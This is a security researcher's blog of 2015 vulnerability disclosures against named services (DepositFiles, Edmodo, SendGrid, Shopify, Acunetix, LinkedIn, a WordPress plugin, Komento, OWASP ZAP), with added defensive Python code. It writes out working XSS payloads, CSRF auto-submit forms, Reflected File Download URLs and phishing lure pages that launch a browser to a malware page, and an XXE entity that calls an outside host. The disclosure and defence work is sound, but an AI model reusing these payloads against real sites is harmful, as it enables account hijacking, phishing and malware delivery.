David Sopas – Web Security Researcher

Advisories

23/11/15 Advisories

DepositFiles ZeroClipboard.swf XSS

DepositFiles is a file storage website and one of the most popular ones. They have been online since 2005 and recently started using the dfiles.eu domain instead of depositfiles.com. They allow free accounts but also charge membership fees.

When searching Google for an old DepositFiles mirror I found a stale ZeroClipboard version that resulted in a Flash-based XSS.
This vulnerability in ZeroClipboard has been well known since 2012, so this is a pretty old issue lying around on this popular file storage site.

Proof-of-concept:

http://static.dfiles.eu/flash/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!prompt(document.domain)//&width&height

With this attack, malicious users could hijack user accounts, run phishing pages, redirect victims to malware and a lot more.

I guess this file was left forgotten on their static.dfiles.eu web server. Old vulnerable files like this can cause a security breach, so if you are a security administrator or web developer, don't forget to clean up any unused or outdated files.

Timeline:
09-11-2015 I sent the security report to DepositFiles
10-11-2015 DepositFiles replied that they forwarded the message to the manager
17-11-2015 I tested my PoC again and it no longer worked because the file had been removed. I requested an update from DepositFiles
23-11-2015 No reply was given but the vulnerable file was deleted so… full disclosure

 

20/11/15 Advisories

Bytes that Rock voting manipulation

Rocky Bytes is a company well known for its informative reviews and news on all the latest games and programs. Each year they promote Bytes That Rock, an event committed to bringing worldwide recognition to the software and blogs that have achieved excellence in the market through hard work, effort and dedication.

After reading the post from Graham Cluley, whom I follow on my daily feed, I decided to check the Bytes That Rock best security blog nominees.

I noticed Brian Krebs (krebsonsecurity.com) there and I'm a big fan of his work. I voted for him and noticed that the voting form had no protection besides IP verification.

Curious as I am, I tried to check the form's security a little further…

I thought to myself – What if I can make Krebs win the competition? 🙂

Since the voting form lacked any security token or CAPTCHA [or even a confirmation email link], I created a small proof-of-concept:

<?php
$email_generator = rand(10000, 9999999) . "@gmail.com";
?>
<form method="post" action="http://www.rockybytes.com/bytes-that-rock/krebs-on-security" name="dsopas">
<input type="hidden" name="email" value="<?php echo $email_generator; ?>" />
<input type="hidden" name="nombre" value="David" />
<input type="hidden" name="programa" value="136" />
<input type="hidden" name="legal" value="on" />
<input type="hidden" value="votar" name="accion"/>
</form><script> document.dsopas.submit(); </script>

I used 2 proxies to open the specially crafted page and both voted successfully for Krebs's blog. So all I needed to cast a vote was a unique IP and an auto-generated email.
But the unique IP didn't need to be mine.

Imagine the following scenario:

On a popular blog or network I post a link to a page that contains a hidden IFRAME loading my proof-of-concept. Each time a user visits the page, it casts a vote for Krebs.

I contacted Rocky Bytes and told them about this security issue. They took less than 24 hours to implement a CAPTCHA system and told me that in the next edition they will improve their security using my suggestions.

[Screenshot: vote_captcha]

They also informed me that – I quote:

You should also know that if we let the users be the only ones who decide, it won't be the best one in each category winning but the one with the biggest amount of fans, and that wouldn't make it fair for those small ones who put a huge effort and create quality software and blogs, jeopardizing the whole purpose and philosophy behind this event. This is the reason why we put together a jury of experts in the field and gave them 70% of the weight in the decision, whilst only the remaining 30% goes for the votes from the public.

As a side note, I informed them that during my testing I voted for Brian Krebs's blog 3 times. One was valid with my own IP and the other two were made with 2 proxies and auto-generated emails with the name David.

I decided to make this public because it's important for other voting systems to take their security into account. Sometimes the winner is manipulated by users who can bypass the system.

I’m glad I’ve helped Bytes that Rock!

06/11/15 Advisories

Edmodo XSS and HTML Injection

For those who don't know Edmodo:

The safest and easiest way for educators to connect and collaborate with students, parents, and each other.

They have 59,411,899 members. A huge number.

I decided to help them by reporting two security issues: a reflected XSS and an HTML injection.

#1 Reflected XSS

After registering on Edmodo I noticed a request to ZeroClipboard.swf in my Google Inspector.
I know that older versions of this SWF have an XSS vulnerability, so I gave it a try:

https://www.edmodo.com/bin/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Guess what? It was a vulnerable version. It worked perfectly and my cookie was shown in a JavaScript alert box.

[Screenshot: zero_xss]

#2 HTML Injection on Create Invites

This was interesting, and I have already found similar issues on many websites.
Using the invitee_first_name field you could inject HTML into the email sent to the victim [invitee_email].

Take for example this proof-of-concept:

Ze<br /><a href="http://www.davidsopas.com/poc/malware.htm" style="font-size:14px;text-decoration:none;margin:0 auto;background:#69a229;color:white;font-weight:400;border:1px solid #457a04;border-radius:4px;display:inline-block" target="_blank"><span style="display:inline-block;padding:10px 34px">Accept Invitation and Win a Bonus</span></a>

When sending a reminder you could also use the same technique:

<br /><a href="http://www.davidsopas.com/poc/malware.htm" style="font-size:14px;text-decoration:none;margin:0 auto;background:#69a229;color:white;font-weight:400;border:1px solid #457a04;border-radius:4px;display:inline-block" target="_blank"><span style="display:inline-block;padding:10px 34px">Accept Invitation and Win a Bonus</span></a>

This would be reflected in the victim's email. I used the same style as an existing Edmodo button, so when the victim clicked it, they were taken to my proof-of-concept page.

Possible attack scenario:

  1. Malicious user sends invitations with an HTML injection [like my proof-of-concept]
  2. Victim thinks it's a button from Edmodo and clicks on it.
  3. Victim's browser gets hijacked

The Edmodo guys were awesome, giving constant updates on the report status. They also sent me some goodies, but European customs retained the package 🙂

Timeline:
13-10-2015 I sent an email asking for a security contact
13-10-2015 Edmodo replied to the above question
13-10-2015 I sent the security report
22-10-2015 Edmodo replied that both issues were validated and they’re working on it
04-11-2015 Edmodo fixed both issues
06-11-2015 Full disclosure

28/10/15 Advisories, Swag

SendGrid Reflected File Download

For those who don’t know who SendGrid is…

SendGrid provides unmatched deliverability, scalability, and reliability. We deliver email on behalf of happy customers such as: Airbnb, Foursquare, Spotify and Uber.

They send over 19 billion emails per month.

When visiting their site I noticed an XHR request in my Google Inspector that caught my attention:

https://sendgrid.com/user/checkLogin?callback=mycallback&callback=jQuery171016384647646918893_1439389801565&_=1439389801826

Which returned the following JSON information:

/**/jQuery171016384647646918893_1439389801565({"status":"success","logged_in":false});

I noticed that the callback name came from the URL, so I decided to inject my RFD vector:

https://sendgrid.com/user/checkLogin?callback=mycallback&callback=||start chrome websegura.net/malware.htm||

Which reflected:

/**/||start chrome websegura.net/malware.htm||({"status":"success","logged_in":false});

Now that I could reflect my payload, I removed the parameters that did nothing for my proof-of-concept and tried to control the filename without causing an HTTP error:

https://sendgrid.com/user/checkLogin/freecoupons.bat?&callback=||start chrome websegura.net/malware.htm||

For Internet Explorer 8 and 9 you didn't need anything else.
If you opened this last URL it would automatically try to download a freecoupons.bat file from the sendgrid.com servers.

[Screenshot: ie_sendgrid_rfd]

On other modern browsers you needed the HTML5 download attribute.
The download would start just by clicking the image.

[Screenshot: chrome_sendgrid_rfd]

A malicious user could:

  1. Launch a malicious campaign with the specially crafted page providing SendGrid.com coupon codes
  2. Victim downloads the file thinking it comes from a trusted domain [SendGrid.com]
  3. Malicious user gains control over the victim's machine

SendGrid were always on top of the issue [cool guys] and they were nice enough to send me an awesome t-shirt 🙂

Timeline:
12-08-2015 Reported this security issue to SendGrid
20-08-2015 SendGrid replied that they were fixing the issue
29-09-2015 Asked for an update
27-10-2015 SendGrid reported that the issue is fixed

15/10/15 Advisories

Events Made Easy WordPress plugin CSRF + Persistent XSS

Plugin link: https://wordpress.org/plugins/events-made-easy/
Active Installs: 10,000+
Version tested: 1.5.49
CVE Reference: Waiting

Events Made Easy is a full-featured event management solution for WordPress. Events Made Easy supports public, private, draft and recurring events, locations management, RSVP (+ optional approval), Paypal, 2Checkout, FirstData and Google maps. With Events Made Easy you can plan and publish your event, or let people reserve spaces for your weekly meetings. You can add events list, calendars and description to your blog using multiple sidebar widgets or shortcodes; if you are a web designer you can simply employ the template tags provided by Events Made Easy.

When playing around with this plugin I noticed a couple of vulnerabilities. In my opinion they are critical because they could cause damage to a WordPress installation.
All of them are related to CSRF where the vendor forgot to place a security token (wp_nonce) on the affected forms.

#1 Add template CSRF + Persistent XSS

URL: /wp-admin/admin.php?page=eme-templates

If an authenticated admin clicks the “Add template” button on an HTML page with this code:

<form action="https://victims_website/wp-admin/admin.php?page=eme-templates" method="POST">
<input type="hidden" name="eme_admin_action" value="do_addtemplate" />
<input type="hidden" name="description" value="<svg/onload=confirm(1)>" />
<input type="hidden" name="format" value="csrf" />
<input type="submit" name="submit" value="Add template" />
</form>

It will add a persistent XSS vector in the template description field, which executes automatically whenever the admin visits admin.php?page=eme-templates.

Possible attack scenario:

  1. Malicious user checks that Events Made Easy is installed on a WordPress installation
  2. Malicious user sends the admin a link to a page that has an auto-submit form with an XSS vector that hijacks the victim's browser
  3. Victim visits the page and gets hijacked

#2 Add Form Field CSRF + Persistent XSS

URL: /wp-admin/admin.php?page=eme-formfields

If an authenticated admin clicks the “Add field” button on an HTML page with this code:

<form action="https://victims_website/wp-admin/admin.php?page=eme-formfields" method="POST">
<input type="hidden" name="eme_admin_action" value="do_addformfield" />
<input type="hidden" name="field_name" value="<svg/onload=confirm(1)>" />
<input type="hidden" name="field_type" value="1" />
<input type="hidden" name="field_info" value="csrf" />
<input type="hidden" name="field_tags" value="csrf" />
<input type="submit" name="submit" value="Add field" />
</form>

The attack scenario is the same as for vulnerability #1; the same issue affects form fields in this plugin.

#3 Remove events older than CSRF

URL: /wp-admin/admin.php?page=eme-cleanup

With this CSRF a malicious user could delete all events older than a given period.
In my proof of concept I used an auto-submit form, which could also be used in vulnerabilities #1 and #2.

<form action="https://victims_website/wp-admin/admin.php?page=eme-cleanup" name="dsopas" method="POST">
<input type="hidden" name="page" value="eme-cleanup" />
<input type="hidden" name="eme_admin_action" value="eme_cleanup" />
<input type="hidden" name="eme_number" value="1" />
<input type="hidden" name="eme_period" value="day" />
<input type="hidden" name="doaction" value="Apply" />
</form> <script> document.dsopas.submit(); </script> 

Possible attack scenario:

  1. Malicious user checks that Events Made Easy is installed on a WordPress installation
  2. Malicious user sends the admin a link to a page that has this auto-submit form
  3. Without the victim noticing, events older than 1 day are removed.

Solution:
The vendor released a patched version, 1.5.50, within a matter of hours, and was kind enough to put my name in the changelog.

30/09/15 Advisories

Komento Joomla! component Persistent XSS

CVE Reference: CVE-2015-7324

Komento is a Joomla! comment extension for articles and blogs in K2, EasyBlog, ZOO, Flexicontent, VirtueMart and redShop.

@http://stackideas.com/komento

I found that it was possible to launch a persistent XSS attack when adding a new comment using the WYSIWYG editor's website and image buttons.
This issue was critical in both environments, frontend and backoffice.

On the frontend, any user who visited a page where a comment carried the XSS payload was affected automatically.
On the other side, the backoffice, the admin was hit by the same attack when reviewing the new comment and could get his account hijacked, or worse.

What I did was pass the XSS vector along in the [img] code and use the JavaScript onload handler to run the exploit when the image loads.

Proof-of-concept using [img]:

[img]http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg" onload="prompt(1)[/img]

Proof-of-concept using [url]:

[url="https://www.davidsopas.com" onmouseover="prompt(1)"]Your text to link[/url]

[Screenshot: komento_onmouseover]

In the [img] case this will reflect the following HTML (on the frontend):

<img src="http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg" data-pagespeed-onload="prompt(1)" alt="http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg" onload="prompt(1)" style="max-width:300px;max-height:300px;" onload="var elem=this;if (this==window) elem=document.body;elem.setAttribute('data-pagespeed-loaded', 1)"/>

[Screenshot: komento_frontend]

And in the administrator area:

<img src="http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg" data-pagespeed-onload="prompt(1)" alt="http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg" onload="prompt(1)" style="max-width:300px;max-height:300px;">

This Joomla! component has lots of Google results and can affect a large number of innocent people. A victim is affected just by visiting a page with a malicious comment.

All versions prior to 2.0.5 are affected.
The vendor has already patched both security issues in the new version 2.0.5 – http://stackideas.com/changelog/komento
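The root cause in both the [img] and [url] cases is that the BBCode value is copied into an HTML attribute unescaped, so the quote in the value closes the attribute and whatever follows (onload=, onmouseover=) becomes a real attribute. The code below is an added example, not Komento's: a renderer that mirrors the flaw beside a hardened one, fed the [img] payload from this post, with a small parser to check which attributes each output really carries; the function names, the payload constant and the URL policy (http/https only, no quotes or whitespace) are my assumptions about what an image host needs.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# The post's [img] comment, constructed here as test input. The quote after
# .jpg ends the src= value and the onload= that follows becomes an attribute.
PAYLOAD = ('[img]http://www.robolaranja.com.br/wp-content/uploads/2014/10/'
           'Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg"'
           ' onload="prompt(1)[/img]')

IMG_TEMPLATE = '<img src="%s" alt="%s" style="max-width:300px;max-height:300px;">'


def _img_body(bbcode):
    return bbcode.strip().removeprefix("[img]").removesuffix("[/img]")


def render_img_vulnerable(bbcode):
    """Mirrors the flaw: the URL is dropped into src= and alt= verbatim."""
    url = _img_body(bbcode)
    return IMG_TEMPLATE % (url, url)


def render_img_safe(bbcode):
    """Hardened: accept only an http(s) URL with no quotes or whitespace,
    then HTML-escape it (quote=True) so it can never leave the attribute."""
    url = _img_body(bbcode).strip()
    try:
        parts = urlsplit(url)
    except ValueError:
        parts = None
    if (parts is None or parts.scheme not in ("http", "https") or not parts.netloc
            or any(c.isspace() for c in url) or '"' in url or "'" in url):
        # Refuse rather than repair: show the BBCode as inert text.
        return html.escape(bbcode)
    safe = html.escape(url, quote=True)
    return IMG_TEMPLATE % (safe, safe)


class _ImgAttrs(HTMLParser):
    """Checker for the output: records the attribute names of each <img>."""
    def __init__(self):
        super().__init__()
        self.img_attrs = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.img_attrs.append(sorted(name for name, _ in attrs))


def img_attribute_names(fragment):
    """Return one sorted attribute-name list per <img> found in fragment."""
    p = _ImgAttrs()
    p.feed(fragment)
    p.close()
    return p.img_attrs


if __name__ == "__main__":
    print(img_attribute_names(render_img_vulnerable(PAYLOAD)))  # onload appears twice
    print(img_attribute_names(render_img_safe(PAYLOAD)))        # [] : no <img> emitted
```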

29/09/15 Advisories

Shopify open to a RFD attack

Before Shopify had a bounty program on HackerOne I had already sent [on 19 March] a security report about a Reflected Filename Download I found on their website.
It doesn't need any authentication such as an access_token or api_key, or even an account on Shopify.

The problem is located under app.shopify.com service.

In Internet Explorer 8 and 9, if you open the following link:

https://app.shopify.com/services/signup/track.bat?callback=foobar&signup_page=http%3A%2F%2Fwww.shopify.com%2F%22||start%20chrome%20davidsopas.com/poc/malware.htm||&_=

It will show a download dialog for a file named track.bat which, when executed, runs Google Chrome with a malicious webpage (in this case it's only text).
Of course a malicious user could run any operating system command he wishes.

In the latest versions of other browsers, such as Chrome, Opera, Firefox, Android Browser and Chrome for Android, you need to visit a page that forces the download using the HTML5 <A DOWNLOAD> attribute:

<div align="center"> 
<a href="https://app.shopify.com/services/signup/track.bat?callback=foobar&signup_page=http%3A%2F%2Fwww.shopify.com%2F%22||start%20chrome%20davidsopas.com/poc/malware.htm||&_=" download="track.bat">
<img src="http://harleyf.com/wp-content/uploads/2010/03/94_shopify.png" border="0" />
</a>
<h1>Shopify is giving away premium service!</h1>
<p><i>(Firefox users: Use "Save link as" to download the file)</i></p>
</div>

When the victim visits a specially crafted page with the code above and clicks the image, the download dialog appears and, after downloading, the browser shows that the file came from Shopify's servers.

[Screenshot: shopify_chrome_rfd]

[Screenshot: shopify_opera_rfd]

So a possible attack scenario will be:

  1. Malicious user sends a link to the victim as he would with a CSRF or an XSS (phishing campaigns, social networks, instant messengers, posts, etc)
  2. Victim clicks the link and, trusting where it came from (Shopify), downloads the file
  3. Victim runs the file and his computer is hijacked

To the victim, the entire process looks like a file offered for download from Shopify's original site and it would not raise any suspicion. A malicious user could gain complete control over a victim's computer system and launch malicious files that appear to originate from a trusted party.

In my opinion this was the last time I'll send anything to Shopify. We have different views on patching security reports.
An example: some of the bounties they have already paid on HackerOne are for Self-XSS and missing SPF. Both issues were awarded the minimum amount, $500. I don't know where or why these issues are more dangerous than my security report, but it's up to them.
I was patient and gave them enough time to fix this issue, even sending them possible solutions. More than 6 months on a paid online store service and still unfixed seems too much.

So beware of this issue because according to Shopify they don’t foresee that this issue will be fixed any time soon.

Timeline:
19-03-2015 Reported this security issue to Shopify
27-03-2015 No reply, so I asked for an update
06-04-2015 First contact from Shopify, replying that the report was being processed
15-04-2015 Shopify told me that this security issue was interesting and asked for more information
15-04-2015 I sent more information and a new proof-of-concept
04-05-2015 I asked for an update (no reply)
15-06-2015 I asked for another update (no reply)
16-09-2015 I asked for another update
22-09-2015 After no email from Shopify since April, they replied that they were working on fixing more urgent issues and considered mine low impact and low priority
23-09-2015 I told them that it's not a social engineering issue, but they still didn't understand it
23-09-2015 Shopify told me that their prioritization is not up for discussion and that they would not be patching any time soon.
25-09-2015 Full disclosure

23/09/15 Advisories

Acunetix got RFDed!

After publishing a report on a piece of security software, OWASP ZAP, I found another vulnerability at a security company, Acunetix.
It reminds me of the proverbial saying:

Shoemaker’s son always goes barefoot.

I found a way to trick users into downloading a batch [executable] file served from ovs.acunetix.com using a Reflected Filename Download vulnerability.
It was funny how I found this one. I noticed that Acunetix allowed vulnerabilities to be tested online and I was curious about that web application. I registered for a demo account and noticed lots of XHR requests in my Google Inspector. So I decided to give RFD a try…

This security issue affected almost all XHR requests on ovs.acunetix.com (Acunetix Online Vulnerability Scanner). Every request allowed a user to inject a callback containing special characters, which is what made the attack possible.

Take this example:

https://ovs.acunetix.com/rpc/reports/count?sgn=1&callback=start chrome davidsopas.com/poc/malware.htm||

Which reflected:

start chrome davidsopas.com/poc/malware.htm||({"message": "get:sgn:invalid size", "data": null, "error": "bad-input"});

It didn’t give any HTTP error:

Request URL:https://ovs.acunetix.com/rpc/reports/count?sgn=1&callback=start%20chrome%20davidsopas.com/poc/malware.htm||
Request Method:GET
Status Code:200 OK
Remote Address:54.209.55.15:443

So I was able to inject a callback and, even though the JSON body reported an error, the response did not return an HTTP error.

Because I couldn't control the filename to force a download, I needed to use the HTML5 download attribute.

<div align="center"> 
 <a href="https://ovs.acunetix.com/rpc/reports/count?sgn=1&callback=start chrome davidsopas.com/poc/malware.htm||" download="setup.bat" onclick="return false;">
 <img src="https://www.davidsopas.com/poc/Acunetix_1.jpg" border="0" />
 </a> 
 <h1>Download Acunetix Web Security Scanner for Free!</h1> 
 <p><i>(Use "Save link as" to download the file)</i></p> 
</div>

As I said before, it happened in almost every XHR request:

https://ovs.acunetix.com/rpc/scans/count?sgn=1&callback=start%20chrome%20davidsopas.com/poc/malware.htm||
https://ovs.acunetix.com/rpc/scans/list?sgn=1&callback=start%20chrome%20davidsopas.com/poc/malware.htm||
https://ovs.acunetix.com/rpc/licenses/get?sgn=1&callback=start%20chrome%20davidsopas.com/poc/malware.htm||

Possible attack scenario:
Because these endpoints can be accessed without authentication, a malicious user could use them to attack any user.

  1. Malicious user creates a specially crafted page, similar to my proof-of-concept, promising a free download of Acunetix web security software.
  2. Victim clicks to download the file [even if the victim checks the page's source code they would see the trusted source, acunetix.com]
  3. Victim runs the file and gets hijacked

The Acunetix security team fixed this vulnerability very fast, proving that they're on top of things. I wish I could see other companies follow Acunetix's patching timeline.

Timeline:

17-09-2015 Reported to Acunetix
17-09-2015 Acunetix acknowledged the vulnerability
18-09-2015 Acunetix informed me that they had fixed this security issue
22-09-2015 Full disclosure

22/09/15 Advisories

OWASP ZAP XXE vulnerability

I just noticed that this is my first full disclosure of an XXE vulnerability. I have already found others, but they were inside private bounty programs.

For those who don't know OWASP ZAP:

The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.
It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing.
ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.

@ https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project

When checking some of the application's files I noticed a lot of XML files, so I decided to play the XXE (XML External Entity) card and check whether OWASP ZAP was vulnerable. I know that finding this type of local vulnerability is a low-severity issue, especially because you need access to the victim's local files, but what if a malicious user wants to backdoor the operating system without the trouble of being detected? Cool idea, right?

What I did:

  • Opened config.xml on OWASP ZAP local path
  • Added the following code after the opening <?xml ?> declaration:
<!DOCTYPE foo [ 
 <!ELEMENT foo ANY >
 <!ENTITY xxe SYSTEM "http://davidsopas.com/XXE" >]><foo>&xxe;</foo>
  • Saved it and ran OWASP ZAP
  • Checking the logs of davidsopas.com, I found:

xx.xx.xxx.xxx - - [14/Aug/2015:16:29:05 +0100] "GET /XXE HTTP/1.1" 301 234 "-" "Java/1.8.0_31"

Keep in mind that config.xml is rewritten when you run the application, so the XXE payload is removed automatically, cleaning up the tracks of a possible malicious user.
Other XML files could also be vulnerable.
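A defender-side counterpart to the steps above, added here as an example and not OWASP ZAP's code: a pre-load scan of an XML file that reports every external DTD or entity declaration without resolving any of them, run against a constructed config.xml that carries the payload from this post. It relies only on Python's expat bindings, which fetch nothing unless an external-entity handler is installed; ZAP's actual fix in 2.4.2 (disabling external entities in its Java parser) is the same idea applied at parse time, and the function names and sample files are mine.

```python
from xml.parsers import expat

# Constructed sample: a config.xml with the post's payload inserted right after
# the XML declaration. The injected <foo> becomes the document element, so the
# real <config> root that follows is "junk" to a strict parser, but the entity
# declaration has already been reported by the time parsing stops.
POISONED_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
 <!ELEMENT foo ANY >
 <!ENTITY xxe SYSTEM "http://davidsopas.com/XXE" >]><foo>&xxe;</foo>
<config><setting>value</setting></config>
"""

# Constructed sample of an untouched file.
CLEAN_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<config><setting>value</setting></config>
"""


def find_external_references(xml_text):
    """Return [(kind, name, uri), ...] for every external DTD and every external
    entity (general or parameter) declared in xml_text.

    Nothing is fetched: expat resolves an external entity only when an
    ExternalEntityRefHandler is installed, and parameter-entity parsing is off
    by default, so this scan cannot itself trigger the callback seen in the log.
    """
    found = []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # <!DOCTYPE x SYSTEM "..."> pulls in an external DTD.
        if system_id or public_id:
            found.append(("doctype", name, system_id or public_id))

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        # <!ENTITY xxe SYSTEM "..."> is external when a system or public id is
        # present; an internal entity carries a literal value instead.
        if system_id or public_id:
            found.append(("entity", name, system_id or public_id))

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(xml_text, True)
    except expat.ExpatError:
        # A malformed file is rejected by the real loader anyway; what matters
        # here is what was declared before the error.
        pass
    return found


def is_safe_to_load(xml_text):
    """Policy check: a local config file should never reference anything external."""
    return not find_external_references(xml_text)


if __name__ == "__main__":
    print(find_external_references(POISONED_CONFIG))  # [('entity', 'xxe', 'http://davidsopas.com/XXE')]
    print(is_safe_to_load(CLEAN_CONFIG))              # True
```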

I reported this issue to the OWASP ZAP guys and they agreed with me that it's not a critical security issue, but they fixed it in version 2.4.2 – https://github.com/zaproxy/zaproxy/issues/1804 – by disabling processing of XML external entities by default.

They were also nice enough to put my name in their acknowledgement list.
If you don't use OWASP ZAP, give it a try. I use it almost every day. It's an excellent pentesting tool with great online support.

18/09/15 Advisories

Linkedin Reflected Filename Download

When researching another website I discovered an XHR request to LinkedIn in my Google Inspector that seemed interesting:

https://www.linkedin.com/countserv/count/share?url=http://www.site_i_was_in.pt

Basically it was the request websites make to count how many shares their site has on the LinkedIn network.
As a curious security researcher I tried to modify the url parameter to something more interesting:

https://www.linkedin.com/countserv/count/share?url="||calc||

Which returned:

IN.Tags.Share.handleCount({"count":0,"fCnt":"0","fCntPlusOne":"1","url":"\"||calc||"});

The url parameter wasn't validated and was reflected in the JSON file.
If I downloaded the file and renamed it to .bat, it executed the Windows calculator.
But this was not enough: I needed to change the path so that it downloaded a batch file, and use a different Windows command.

https://www.linkedin.com/countserv/count/share;setup.bat?url="||start chrome websegura.net/malware.htm||

Guess what? IE8 automatically downloaded this batch file from a trusted domain, linkedin.com.
I wanted it to work in other browsers too, so I needed the HTML5 download attribute.

<div align="center"> 
<a href='https://www.linkedin.com/countserv/count/share;setup.bat?url="||start chrome websegura.net/malware.htm||' download="setup.bat" onclick="return false;">
<img src="http://damnlink.com/uploaded_images/godaddy_coupons_and_godaddy_promo_code_3187745288.png" border="0" /></a> 
<h1>Linkedin Premium account!</h1> 
<p><i>(Use "Save link as" to download the file)</i></p> 
</div>

[Screenshot: linkedin_rfd_chrome]

So a possible attack scenario would be:

  1. Malicious user sends a link to the victim as he would with a CSRF or an XSS (phishing campaigns, social networks, instant messengers, posts, etc)
  2. Victim clicks the link and, trusting where it came from (LinkedIn), downloads the file
  3. Victim runs the file and his computer is hijacked

A malicious user could give the HTML5 download page even more credibility by chaining well-known open redirect vulnerabilities on trusted sites, such as open redirects on Google or even on LinkedIn.

To the victim, the entire process looks like a file offered for download from LinkedIn's original site and it would not raise any suspicion. A malicious user could gain complete control over a victim's computer system and launch malicious files that appear to originate from a trusted party.

Malicious users are always searching for better ways of gaining trust of victims. This could be the right online weapon.
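The four RFD posts above (SendGrid, Shopify, Acunetix and this one) share one shape: a JSONP endpoint reflects the callback name, the response stays HTTP 200 even on bad input, and the filename is left for the URL path or an <a download> to choose. The hardened JSONP handler below is an added example, not code from any of these vendors; it applies the controls recommended in Oren Hafif's RFD paper (validate the callback, pin the filename with Content-Disposition, send X-Content-Type-Options: nosniff) and runs the URLs from these posts through it. The function and constant names are mine, and the fixed filename f.txt is a convention rather than a requirement.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# A callback is accepted only as a dotted JavaScript identifier, e.g.
# IN.Tags.Share.handleCount or jQuery171016384647646918893_1439389801565.
# Quotes, pipes, spaces and semicolons never match, so the "||start chrome ...||"
# and "||calc||" vectors are refused before they can reach the response body.
_CALLBACK_RE = re.compile(r"[A-Za-z_$][A-Za-z0-9_$]*(?:\.[A-Za-z_$][A-Za-z0-9_$]*)*")

# Sent on every response, valid or not.
SAFE_HEADERS = {
    "Content-Type": "application/javascript; charset=utf-8",
    # Pins the download name: a path such as /checkLogin/freecoupons.bat or
    # /share;setup.bat no longer decides what the browser saves the file as.
    # Browsers ignore the disposition for <script src>, so JSONP keeps working.
    "Content-Disposition": 'attachment; filename="f.txt"',
    # Stops the browser from sniffing a different type out of the body.
    "X-Content-Type-Options": "nosniff",
}


def is_safe_callback(name):
    """True only for a plain (dotted) identifier."""
    return _CALLBACK_RE.fullmatch(name) is not None


def jsonp_response(url, data):
    """Return (status, headers, body) for a JSONP request URL.

    `data` is whatever the endpoint wants to return, e.g. {"status": "success",
    "logged_in": False}. The callback is validated and `data` is JSON-encoded;
    encoding alone is not enough (LinkedIn escaped the quote as \\" and cmd.exe
    still ran calc), which is why the headers above are the real fix.
    """
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    callbacks = params.get("callback", [])
    # SendGrid's request carried callback= twice; a repeated or missing
    # parameter is ambiguous, so require exactly one valid name.
    if len(callbacks) != 1 or not is_safe_callback(callbacks[0]):
        body = json.dumps({"error": "bad-input", "message": "invalid callback"})
        return 400, SAFE_HEADERS, body
    body = "/**/" + callbacks[0] + "(" + json.dumps(data) + ");"
    return 200, SAFE_HEADERS, body


if __name__ == "__main__":
    ok = {"status": "success", "logged_in": False}
    # The SendGrid vector from the post: rejected, nothing reflected.
    print(jsonp_response(
        "https://sendgrid.com/user/checkLogin/freecoupons.bat"
        "?&callback=||start chrome websegura.net/malware.htm||", ok))
    # A legitimate jQuery callback: served as before, with the pinned filename.
    print(jsonp_response(
        "https://sendgrid.com/user/checkLogin"
        "?callback=jQuery171016384647646918893_1439389801565&_=1439389801826", ok))
```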

Timeline:
11-05-2015 Sent the report to Linkedin
11-05-2015 LinkedIn replied without understanding the true nature of the attack
11-05-2015 I replied with more information, citing other public RFD attacks and Oren Hafif's paper on RFD
13-05-2015 LinkedIn told me that they were working on a solution
02-06-2015 I asked for an update
03-06-2015 Linkedin replied that they will give me an update soon
01-07-2015 I asked again for an update
09-09-2015 LinkedIn replied that they had fixed the issue
18-09-2015 Full disclosure
